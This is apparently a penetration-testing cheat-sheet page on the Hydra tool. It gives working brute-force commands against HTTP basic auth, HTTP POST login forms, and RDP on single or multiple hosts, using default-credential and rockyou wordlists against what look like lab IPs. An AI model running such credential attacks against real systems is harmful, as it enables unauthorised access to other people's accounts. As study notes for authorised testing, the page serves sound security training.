Hydra

Hydra Supported Services

hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e

HTTP AUTH Bruteforce

We can use hydra to pass it colon seperated wordlist with default credentials and we can try to do a bruteforce attack on the http login, i will use the wordlist from seclists which containes the default credentials by colon seperation

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt http-get://94.237.53.3:40213/

Hydra POST Form BruteForce Attack

If you have a login page and you need to bruteforce the creds for that, one way is you can use the burpsuite Intruder, the Second thing which we can use is Hydra Post Form as well

there are 3 things we need to add after http-post-form, -s is for port

Login Endpoint
Parameters
Fail or success msg OR Something from Page Source

hydra -l admin -P /usr/share/wordlists/rockyou.txt 94.237.63.83 -s 51867 http-post-form "/login.php:username=^USER^&password=^PASS^:<form name='login'" -f

Hydra on RDP Port 3389

hydra -L users.txt -P passwords.txt rdp://127.0.0.1

Hydra on RDP with Multipe IPs

hydra -L users.txt -P passwords.txt -M IPs.txt rdp

PreviousMethodology NextCewl

Last updated 1 year ago

hashtagHydra Supported Services

hashtagHTTP AUTH Bruteforce

hashtagHydra POST Form BruteForce Attack

hashtagHydra on RDP Port 3389

hashtagHydra on RDP with Multipe IPs

Hydra Supported Services

HTTP AUTH Bruteforce

Hydra POST Form BruteForce Attack

Hydra on RDP Port 3389

Hydra on RDP with Multipe IPs